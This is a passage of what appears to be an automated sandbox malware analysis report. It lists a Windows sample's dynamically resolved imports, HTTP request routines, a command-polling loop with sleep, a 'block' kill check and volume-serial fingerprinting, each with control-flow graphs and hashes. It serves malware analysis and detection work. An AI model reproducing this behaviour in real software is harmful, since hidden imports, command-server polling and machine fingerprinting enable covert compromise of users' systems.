                                        • GetProcAddress.KERNEL32(77190000,009DD740), ref: 00CB9E44
                                        • GetProcAddress.KERNEL32(77190000,009C5668), ref: 00CB9E5D
                                        • GetProcAddress.KERNEL32(77190000,009DD6F8), ref: 00CB9E75
                                        • GetProcAddress.KERNEL32(77190000,009DD6B0), ref: 00CB9E8D
                                        • GetProcAddress.KERNEL32(77190000,009DD770), ref: 00CB9EA6
                                        • GetProcAddress.KERNEL32(77190000,009DD7A0), ref: 00CB9EBE
                                        • GetProcAddress.KERNEL32(77190000,009DD638), ref: 00CB9ED6
                                        • GetProcAddress.KERNEL32(77190000,009DD650), ref: 00CB9EEF
                                        • GetProcAddress.KERNEL32(77190000,009DD668), ref: 00CB9F07
                                        • GetProcAddress.KERNEL32(77190000,009DD680), ref: 00CB9F1F
                                        • GetProcAddress.KERNEL32(77190000,009DD200), ref: 00CB9F38
                                        • GetProcAddress.KERNEL32(77190000,009CF808), ref: 00CB9F50
                                        • GetProcAddress.KERNEL32(77190000,009DD308), ref: 00CB9F68
                                        • GetProcAddress.KERNEL32(77190000,009DD218), ref: 00CB9F81
                                        • GetProcAddress.KERNEL32(77190000,009C56A8), ref: 00CB9F99
                                        • GetProcAddress.KERNEL32(77190000,009DD1A0), ref: 00CB9FB1
                                        • GetProcAddress.KERNEL32(77190000,009C56E8), ref: 00CB9FCA
                                        • GetProcAddress.KERNEL32(77190000,009DD0B0), ref: 00CB9FE2
                                        • GetProcAddress.KERNEL32(77190000,009DD0C8), ref: 00CB9FFA
                                        • GetProcAddress.KERNEL32(77190000,009C5388), ref: 00CBA013
                                        • GetProcAddress.KERNEL32(77190000,009C53A8), ref: 00CBA02B
                                        • LoadLibraryA.KERNEL32(009DD128,?,00CB5CA3,00CC0AEB,?,?,?,?,?,?,?,?,?,?,00CC0AEA,00CC0AE3), ref: 00CBA03D
                                        • LoadLibraryA.KERNEL32(009DD1B8,?,00CB5CA3,00CC0AEB,?,?,?,?,?,?,?,?,?,?,00CC0AEA,00CC0AE3), ref: 00CBA04E
                                        • LoadLibraryA.KERNEL32(009DD0E0,?,00CB5CA3,00CC0AEB,?,?,?,?,?,?,?,?,?,?,00CC0AEA,00CC0AE3), ref: 00CBA060
                                        • LoadLibraryA.KERNEL32(009DD0F8,?,00CB5CA3,00CC0AEB,?,?,?,?,?,?,?,?,?,?,00CC0AEA,00CC0AE3), ref: 00CBA072
                                        • LoadLibraryA.KERNEL32(009DD2D8,?,00CB5CA3,00CC0AEB,?,?,?,?,?,?,?,?,?,?,00CC0AEA,00CC0AE3), ref: 00CBA083
                                        • LoadLibraryA.KERNEL32(009DD080,?,00CB5CA3,00CC0AEB,?,?,?,?,?,?,?,?,?,?,00CC0AEA,00CC0AE3), ref: 00CBA095
                                        • LoadLibraryA.KERNEL32(009DD248,?,00CB5CA3,00CC0AEB,?,?,?,?,?,?,?,?,?,?,00CC0AEA,00CC0AE3), ref: 00CBA0A7
                                        • LoadLibraryA.KERNEL32(009DD1D0,?,00CB5CA3,00CC0AEB,?,?,?,?,?,?,?,?,?,?,00CC0AEA,00CC0AE3), ref: 00CBA0B8
                                        • GetProcAddress.KERNEL32(77040000,009C5168), ref: 00CBA0DA
                                        • GetProcAddress.KERNEL32(77040000,009DD320), ref: 00CBA0F2
                                        • GetProcAddress.KERNEL32(77040000,009D8C08), ref: 00CBA10A
                                        • GetProcAddress.KERNEL32(77040000,009DD170), ref: 00CBA123
                                        • GetProcAddress.KERNEL32(77040000,009C5128), ref: 00CBA13B
                                        • GetProcAddress.KERNEL32(704D0000,009CA7A8), ref: 00CBA160
                                        • GetProcAddress.KERNEL32(704D0000,009C5068), ref: 00CBA179
                                        • GetProcAddress.KERNEL32(704D0000,009CA528), ref: 00CBA191
                                        • GetProcAddress.KERNEL32(704D0000,009DD1E8), ref: 00CBA1A9
                                        • GetProcAddress.KERNEL32(704D0000,009DD2C0), ref: 00CBA1C2
                                        • GetProcAddress.KERNEL32(704D0000,009C4FC8), ref: 00CBA1DA
                                        • GetProcAddress.KERNEL32(704D0000,009C5048), ref: 00CBA1F2
                                        • GetProcAddress.KERNEL32(704D0000,009DD188), ref: 00CBA20B
                                        • GetProcAddress.KERNEL32(768D0000,009C5008), ref: 00CBA22C
                                        • GetProcAddress.KERNEL32(768D0000,009C5348), ref: 00CBA244
                                        • GetProcAddress.KERNEL32(768D0000,009DD230), ref: 00CBA25D
                                        • GetProcAddress.KERNEL32(768D0000,009DD110), ref: 00CBA275
                                        • GetProcAddress.KERNEL32(768D0000,009C5088), ref: 00CBA28D
                                        • GetProcAddress.KERNEL32(75790000,009CA690), ref: 00CBA2B3
                                        • GetProcAddress.KERNEL32(75790000,009CA6E0), ref: 00CBA2CB
                                        • GetProcAddress.KERNEL32(75790000,009DD260), ref: 00CBA2E3
                                        • GetProcAddress.KERNEL32(75790000,009C50A8), ref: 00CBA2FC
                                        • GetProcAddress.KERNEL32(75790000,009C5148), ref: 00CBA314
                                        • GetProcAddress.KERNEL32(75790000,009CA618), ref: 00CBA32C
                                        • GetProcAddress.KERNEL32(75A10000,009DD140), ref: 00CBA352
                                        • GetProcAddress.KERNEL32(75A10000,009C51C8), ref: 00CBA36A
                                        • GetProcAddress.KERNEL32(75A10000,009D8C18), ref: 00CBA382
                                        • GetProcAddress.KERNEL32(75A10000,009DD278), ref: 00CBA39B
                                        • GetProcAddress.KERNEL32(75A10000,009DD290), ref: 00CBA3B3
                                        • GetProcAddress.KERNEL32(75A10000,009C5028), ref: 00CBA3CB
                                        • GetProcAddress.KERNEL32(75A10000,009C5208), ref: 00CBA3E4
                                        • GetProcAddress.KERNEL32(75A10000,009DD2A8), ref: 00CBA3FC
                                        • GetProcAddress.KERNEL32(75A10000,009DD038), ref: 00CBA414
                                        • GetProcAddress.KERNEL32(76850000,009C5268), ref: 00CBA436
                                        • GetProcAddress.KERNEL32(76850000,009DD158), ref: 00CBA44E
                                        • GetProcAddress.KERNEL32(76850000,009DD2F0), ref: 00CBA466
                                        • GetProcAddress.KERNEL32(76850000,009DD050), ref: 00CBA47F
                                        • GetProcAddress.KERNEL32(76850000,009DD068), ref: 00CBA497
                                        • GetProcAddress.KERNEL32(75690000,009C51E8), ref: 00CBA4B8
                                        • GetProcAddress.KERNEL32(75690000,009C5288), ref: 00CBA4D1
                                        • GetProcAddress.KERNEL32(769C0000,009C50C8), ref: 00CBA4F2
                                        • GetProcAddress.KERNEL32(769C0000,009DD098), ref: 00CBA50A
                                        • GetProcAddress.KERNEL32(6F8C0000,009C50E8), ref: 00CBA530
                                        • GetProcAddress.KERNEL32(6F8C0000,009C5228), ref: 00CBA548
                                        • GetProcAddress.KERNEL32(6F8C0000,009C5108), ref: 00CBA560
                                        • GetProcAddress.KERNEL32(6F8C0000,009DD5A8), ref: 00CBA579
                                        • GetProcAddress.KERNEL32(6F8C0000,009C5188), ref: 00CBA591
                                        • GetProcAddress.KERNEL32(6F8C0000,009C4F88), ref: 00CBA5A9
                                        • GetProcAddress.KERNEL32(6F8C0000,009C51A8), ref: 00CBA5C2
                                        • GetProcAddress.KERNEL32(6F8C0000,009C5248), ref: 00CBA5DA
                                        • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00CBA5F1
                                        • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00CBA607
                                        • GetProcAddress.KERNEL32(75D90000,009DD578), ref: 00CBA629
                                        • GetProcAddress.KERNEL32(75D90000,009D8C78), ref: 00CBA641
                                        • GetProcAddress.KERNEL32(75D90000,009DD368), ref: 00CBA659
                                        • GetProcAddress.KERNEL32(75D90000,009DD500), ref: 00CBA672
                                        • GetProcAddress.KERNEL32(76470000,009C52A8), ref: 00CBA693
                                        • GetProcAddress.KERNEL32(6EDA0000,009DD4D0), ref: 00CBA6B4
                                        • GetProcAddress.KERNEL32(6EDA0000,009C5368), ref: 00CBA6CD
                                        • GetProcAddress.KERNEL32(6EDA0000,009DD5C0), ref: 00CBA6E5
                                        • GetProcAddress.KERNEL32(6EDA0000,009DD470), ref: 00CBA6FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: HttpQueryInfoA$InternetSetOptionA
                                        • API String ID: 2238633743-1775429166
                                        • Opcode ID: 973cc9c39ccdadcb79aeb5459d19b6e568bedcf3861d8b214c717a023d9fc723
                                        • Instruction ID: 5a699504bb1e1ade664a15fed1326831be13067365ea39d19b1012cf4fb2580a
                                        • Opcode Fuzzy Hash: 973cc9c39ccdadcb79aeb5459d19b6e568bedcf3861d8b214c717a023d9fc723
                                        • Instruction Fuzzy Hash: 9E623DB5500288AFC358DFAAEDC89563BF9F74C30170D853EB605EB264D639B489CB16
                                        Function 00CA6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1033 ca6280-ca630b call cba7a0 call ca47b0 call cba740 InternetOpenA StrCmpCA 1040 ca630d 1033->1040 1041 ca6314-ca6318 1033->1041 1040->1041 1042 ca6509-ca6525 call cba7a0 call cba800 * 2 1041->1042 1043 ca631e-ca6342 InternetConnectA 1041->1043 1062 ca6528-ca652d 1042->1062 1044 ca6348-ca634c 1043->1044 1045 ca64ff-ca6503 InternetCloseHandle 1043->1045 1047 ca635a 1044->1047 1048 ca634e-ca6358 1044->1048 1045->1042 1050 ca6364-ca6392 HttpOpenRequestA 1047->1050 1048->1050 1052 ca6398-ca639c 1050->1052 1053 ca64f5-ca64f9 InternetCloseHandle 1050->1053 1055 ca639e-ca63bf InternetSetOptionA 1052->1055 1056 ca63c5-ca6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1045 1055->1056 1058 ca642c-ca644b call cb8940 1056->1058 1059 ca6407-ca6427 call cba740 call cba800 * 2 1056->1059 1066 ca64c9-ca64e9 call cba740 call cba800 * 2 1058->1066 1067 ca644d-ca6454 1058->1067 1059->1062 1066->1062 1069 ca6456-ca6480 InternetReadFile 1067->1069 1070 ca64c7-ca64ef InternetCloseHandle 1067->1070 1073 ca648b 1069->1073 1074 ca6482-ca6489 1069->1074 1070->1053 1073->1070 1074->1073 1079 ca648d-ca64c5 call cba9b0 call cba8a0 call cba800 1074->1079 1079->1069
                                        APIs
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CA4839
                                          • Part of subcall function 00CA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CA4849
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        • InternetOpenA.WININET(00CC0DFE,00000001,00000000,00000000,00000000), ref: 00CA62E1
                                        • StrCmpCA.SHLWAPI(?,009DF1A0), ref: 00CA6303
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CA6335
                                        • HttpOpenRequestA.WININET(00000000,GET,?,009DE910,00000000,00000000,00400100,00000000), ref: 00CA6385
                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00CA63BF
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CA63D1
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00CA63FD
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00CA646D
                                        • InternetCloseHandle.WININET(00000000), ref: 00CA64EF
                                        • InternetCloseHandle.WININET(00000000), ref: 00CA64F9
                                        • InternetCloseHandle.WININET(00000000), ref: 00CA6503
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                        • String ID: ERROR$ERROR$GET
                                        • API String ID: 3749127164-2509457195
                                        • Opcode ID: 54d240771b8b9115aed768506e6f5ef1be74c073b7f9dd75b3e1821b889442a0
                                        • Instruction ID: 821f2eaaa3100daacce27fe94924fdfee6ba5dcf93bc0311264cfc71ad0c4119
                                        • Opcode Fuzzy Hash: 54d240771b8b9115aed768506e6f5ef1be74c073b7f9dd75b3e1821b889442a0
                                        • Instruction Fuzzy Hash: 82716E71A00218AFDB24DFA1CC89FEE7778BB49704F148168F10A6B1D0DBB56A89DF51
                                        Function 00CB5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1090 cb5510-cb5577 call cb5ad0 call cba820 * 3 call cba740 * 4 1106 cb557c-cb5583 1090->1106 1107 cb55d7-cb564c call cba740 * 2 call ca1590 call cb52c0 call cba8a0 call cba800 call cbaad0 StrCmpCA 1106->1107 1108 cb5585-cb55b6 call cba820 call cba7a0 call ca1590 call cb51f0 1106->1108 1133 cb5693-cb56a9 call cbaad0 StrCmpCA 1107->1133 1138 cb564e-cb568e call cba7a0 call ca1590 call cb51f0 call cba8a0 call cba800 1107->1138 1124 cb55bb-cb55d2 call cba8a0 call cba800 1108->1124 1124->1133 1140 cb56af-cb56b6 1133->1140 1141 cb57dc-cb5844 call cba8a0 call cba820 * 2 call ca1670 call cba800 * 4 call cb6560 call ca1550 1133->1141 1138->1133 1144 cb57da-cb585f call cbaad0 StrCmpCA 1140->1144 1145 cb56bc-cb56c3 1140->1145 1270 cb5ac3-cb5ac6 1141->1270 1164 cb5991-cb59f9 call cba8a0 call cba820 * 2 call ca1670 call cba800 * 4 call cb6560 call ca1550 1144->1164 1165 cb5865-cb586c 1144->1165 1149 cb571e-cb5793 call cba740 * 2 call ca1590 call cb52c0 call cba8a0 call cba800 call cbaad0 StrCmpCA 1145->1149 1150 cb56c5-cb5719 call cba820 call cba7a0 call ca1590 call cb51f0 call cba8a0 call cba800 1145->1150 1149->1144 1250 cb5795-cb57d5 call cba7a0 call ca1590 call cb51f0 call cba8a0 call cba800 1149->1250 1150->1144 1164->1270 1171 cb598f-cb5a14 call cbaad0 StrCmpCA 1165->1171 1172 cb5872-cb5879 1165->1172 1201 cb5a28-cb5a91 call cba8a0 call cba820 * 2 call ca1670 call cba800 * 4 call cb6560 call ca1550 1171->1201 1202 cb5a16-cb5a21 Sleep 1171->1202 1180 cb587b-cb58ce call cba820 call cba7a0 call ca1590 call cb51f0 call cba8a0 call cba800 1172->1180 1181 cb58d3-cb5948 call cba740 * 2 call ca1590 call cb52c0 call cba8a0 call cba800 call cbaad0 StrCmpCA 1172->1181 1180->1171 1181->1171 1275 cb594a-cb598a call cba7a0 call ca1590 call cb51f0 call cba8a0 call cba800 1181->1275 1201->1270 1202->1106 1250->1144 1275->1171
                                        APIs
                                          • Part of subcall function 00CBA820: lstrlen.KERNEL32(00CA4F05,?,?,00CA4F05,00CC0DDE), ref: 00CBA82B
                                          • Part of subcall function 00CBA820: lstrcpy.KERNEL32(00CC0DDE,00000000), ref: 00CBA885
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CB5644
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CB56A1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CB5857
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CB51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CB5228
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CB52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CB5318
                                          • Part of subcall function 00CB52C0: lstrlen.KERNEL32(00000000), ref: 00CB532F
                                          • Part of subcall function 00CB52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00CB5364
                                          • Part of subcall function 00CB52C0: lstrlen.KERNEL32(00000000), ref: 00CB5383
                                          • Part of subcall function 00CB52C0: lstrlen.KERNEL32(00000000), ref: 00CB53AE
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CB578B
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CB5940
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CB5A0C
                                        • Sleep.KERNEL32(0000EA60), ref: 00CB5A1B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen$Sleep
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 507064821-2791005934
                                        • Opcode ID: 0a980de386789ef7630d5d124b253e353bc46bcc807e15733f01f94594e87cc2
                                        • Instruction ID: d692b5450978ba25a32251e185c15fdbd5fdb348bd8573a1dc5599290a89b2e9
                                        • Opcode Fuzzy Hash: 0a980de386789ef7630d5d124b253e353bc46bcc807e15733f01f94594e87cc2
                                        • Instruction Fuzzy Hash: 6CE12F71910208AACB18FBA1DC96EFD737CAF54300F548128F556664D2EF356B0DEBA2
                                        Function 00CB17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1301 cb17a0-cb17cd call cbaad0 StrCmpCA 1304 cb17cf-cb17d1 ExitProcess 1301->1304 1305 cb17d7-cb17f1 call cbaad0 1301->1305 1309 cb17f4-cb17f8 1305->1309 1310 cb17fe-cb1811 1309->1310 1311 cb19c2-cb19cd call cba800 1309->1311 1313 cb199e-cb19bd 1310->1313 1314 cb1817-cb181a 1310->1314 1313->1309 1316 cb1849-cb1858 call cba820 1314->1316 1317 cb18cf-cb18e0 StrCmpCA 1314->1317 1318 cb198f-cb1999 call cba820 1314->1318 1319 cb18ad-cb18be StrCmpCA 1314->1319 1320 cb1821-cb1830 call cba820 1314->1320 1321 cb187f-cb1890 StrCmpCA 1314->1321 1322 cb185d-cb186e StrCmpCA 1314->1322 1323 cb1913-cb1924 StrCmpCA 1314->1323 1324 cb1932-cb1943 StrCmpCA 1314->1324 1325 cb18f1-cb1902 StrCmpCA 1314->1325 1326 cb1951-cb1962 StrCmpCA 1314->1326 1327 cb1970-cb1981 StrCmpCA 1314->1327 1328 cb1835-cb1844 call cba820 1314->1328 1316->1313 1350 cb18ec 1317->1350 1351 cb18e2-cb18e5 1317->1351 1318->1313 1348 cb18ca 1319->1348 1349 cb18c0-cb18c3 1319->1349 1320->1313 1346 cb189e-cb18a1 1321->1346 1347 cb1892-cb189c 1321->1347 1344 cb187a 1322->1344 1345 cb1870-cb1873 1322->1345 1331 cb1930 1323->1331 1332 cb1926-cb1929 1323->1332 1333 cb194f 1324->1333 1334 cb1945-cb1948 1324->1334 1329 cb190e 1325->1329 1330 cb1904-cb1907 1325->1330 1335 cb196e 1326->1335 1336 cb1964-cb1967 1326->1336 1338 cb198d 1327->1338 1339 cb1983-cb1986 1327->1339 1328->1313 1329->1313 1330->1329 1331->1313 1332->1331 1333->1313 1334->1333 1335->1313 1336->1335 1338->1313 1339->1338 1344->1313 1345->1344 1355 cb18a8 1346->1355 1347->1355 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                                        APIs
                                        • StrCmpCA.SHLWAPI(00000000,block), ref: 00CB17C5
                                        • ExitProcess.KERNEL32 ref: 00CB17D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID: block
                                        • API String ID: 621844428-2199623458
                                        • Opcode ID: e5b7ad57c99c756edc16a7d67616acb1051fabcff0390994cf0eceaad7b2abd6
                                        • Instruction ID: c1d30408971cdbfadef1f0d3a836b511b8be366a6af87ee958d25f8b4e363225
                                        • Opcode Fuzzy Hash: e5b7ad57c99c756edc16a7d67616acb1051fabcff0390994cf0eceaad7b2abd6
                                        • Instruction Fuzzy Hash: 45517EB4A00249EFCB04DFA1D9A8BFE77B5BF44340F14806CE816AB240D771EA45DB62
                                        Function 00CB7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1356 cb7500-cb754a GetWindowsDirectoryA 1357 cb754c 1356->1357 1358 cb7553-cb75c7 GetVolumeInformationA call cb8d00 * 3 1356->1358 1357->1358 1365 cb75d8-cb75df 1358->1365 1366 cb75fc-cb7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 cb75e1-cb75fa call cb8d00 1365->1367 1369 cb7619-cb7626 call cba740 1366->1369 1370 cb7628-cb7658 wsprintfA call cba740 1366->1370 1367->1365 1377 cb767e-cb768e 1369->1377 1370->1377
                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00CB7542
                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CB757F
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB7603
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB760A
                                        • wsprintfA.USER32 ref: 00CB7640
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
